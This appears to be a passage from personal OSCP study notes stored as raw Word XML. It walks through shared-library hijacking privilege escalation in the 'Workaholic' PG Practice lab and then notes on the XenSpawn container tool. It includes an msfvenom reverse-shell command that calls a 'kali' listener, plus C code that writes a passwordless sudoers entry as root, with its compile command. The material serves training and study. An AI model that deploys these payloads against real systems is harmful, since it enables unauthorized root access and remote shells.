        <w:t xml:space="preserve"> PG Practice.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003578">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="619"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is the msfvenom one:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003579">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="619"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p linux/x64/shell_reverse_tcp -f elf-so -o utils.so LHOST=kali LPORT=6379</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000357A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000357B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_lrw6gtha03cv" w:id="479"/>
      <w:bookmarkEnd w:id="479"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000357C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000357D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1144">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Workaholic</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice, we used "strings" to analyze a binary we can run as SUID, and it was trying to load </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/ted/.lib/libsecurity.so</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and specifically the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">init_plugin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" function</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000357E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000357F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1803400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="48" name="image42.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image42.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1145"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1803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580">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003581">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, we can manually create a C file with a malicious init_plugin function and then compile it as a .so file and put it in /home/ted/.lib since we have full permissions there</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003582">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003583">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">// libsecurity.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003584">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003585">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#include &lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003586">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#include &lt;unistd.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003587">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003588">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">void init_plugin() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003589">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    setuid(0); setgid(0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000358A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    system("echo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'charlie </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ALL=(ALL:ALL) NOPASSWD:ALL' &gt;&gt; /etc/sudoers");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000358B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pP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358C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">charlie</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" with your own user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000358D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000358E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc -shared -fPIC -o libsecurity.so libsecurity.c -Wl,--export-dynamic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000358F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1151"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-Wl,--export-dynamic → This one is a bit special.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003590">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1151"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-Wl, → Passes the following options directly to the linker (ld).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003591">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1151"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--export-dynamic → Ensures that symbols from the main executable are added to the dynamic symbol table, so that they can be used by your shared object (like when using dlsym() to resolve symbols in the main binary).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003592">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1151"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In your case, it might not be strictly necessary, since your library doesn’t call back into symbols of the main program, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">but it’s sometimes added for plugin compatibility</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003593">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003594">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although the standard "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc -shared -o libsecurity.so -fPIC libsecurity.c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" might have worked too</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003595">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003596">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then we run the binary with SUID and we see that our user (charlie) can now run sudo as any user!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003597">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035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99">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000359A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_459rzjy8k7qe" w:id="480"/>
      <w:bookmarkEnd w:id="480"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Everything about C (gcc, glibc, ldd, .so, -fPIC, -static)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000359B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000359C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yxc2cbrkmnvx" w:id="481"/>
      <w:bookmarkEnd w:id="481"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XenSpawn</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000359D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId1146">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/X0RW3LL/XenSpawn?tab=readme-ov-file</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000359E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000359F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Currently have a container already:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1279"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Container size and location on disk: 435M   /var/lib/machines/xenial</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035A1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035A2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to rename:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="907"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo machinectl rename MACHINE_NAME xenial</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="907"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I renamed from MACHINE_NAME to xenial since MACHINE_NAME syntax caused problems when I tried starting it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035A5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035A6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This a tool specifically made for OSCP, but it can be used in other cases. It's made for the cases when you have GLIBC errors as such:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="921"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/path/to/libc.so.6: version 'GLIBC_2.34' not found</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035A8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
